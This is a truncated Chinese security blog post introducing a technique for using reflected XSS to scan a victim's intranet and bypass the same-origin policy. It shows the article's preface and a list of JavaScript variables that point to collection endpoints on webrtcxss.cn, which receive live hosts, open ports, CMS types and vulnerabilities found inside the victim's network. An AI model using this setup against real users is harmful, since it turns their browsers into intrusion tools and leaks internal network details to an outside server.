0x01 前言:
很多人都认为XSS只能做盗取cookies的活。以至于有些SRC、厂商对待反射型XSS视而不见,或者说是根本不重视。
直到“黑哥”在之前的演讲中提到XSS入侵内网,情况才得以好转。但是经过本人测试,黑哥所说的XSS内网入侵,应该是包含了浏览器漏洞。那没有浏览器漏洞该如何呢?就像0x_Jin之前在乌云报道的搜狐漏洞那样: http://www.wooyun.org/bugs/wooyun-2014-076685
这里有几个需要注意的地方:由于浏览器的同源策略问题导致没有办法做到真正意义上的内网入侵,当然如果你又浏览器的0day,那事情就另当别论了。
而0x_Jin在乌云中的那篇漏洞报告,我自己本人也去问了。答复就是只是检测了开放的80端口,就没有后续了。黑哥没有公布完整的代码,0x_Jin没有深入。既然都没有,就交给我吧。这里我将会使用其他办法“绕过浏览器的同源策略”。
0x02构架:
代码采用了类似XSS平台那种实时反馈机制。在这里我先把变量介绍一遍: 1 2 3 4 5 6 7 8 var onlyString = "abc" ; var ipList = []; var survivalIpLIst = []; var deathIpLIst = []; var sendsurvivalIp = "http://webrtcxss.cn/Api/survivalIp" ; var snedIteratesIpUrl = "http://webrtcxss.cn/Api/survivalPortIp" ; var snedIteratesCmsIpUrl = "http://webrtcxss.cn/Api/survivalCmsIp" ; var sendExistenceVul = "http://webrtcxss.cn/Api/existenceVul" ;
阅读全文...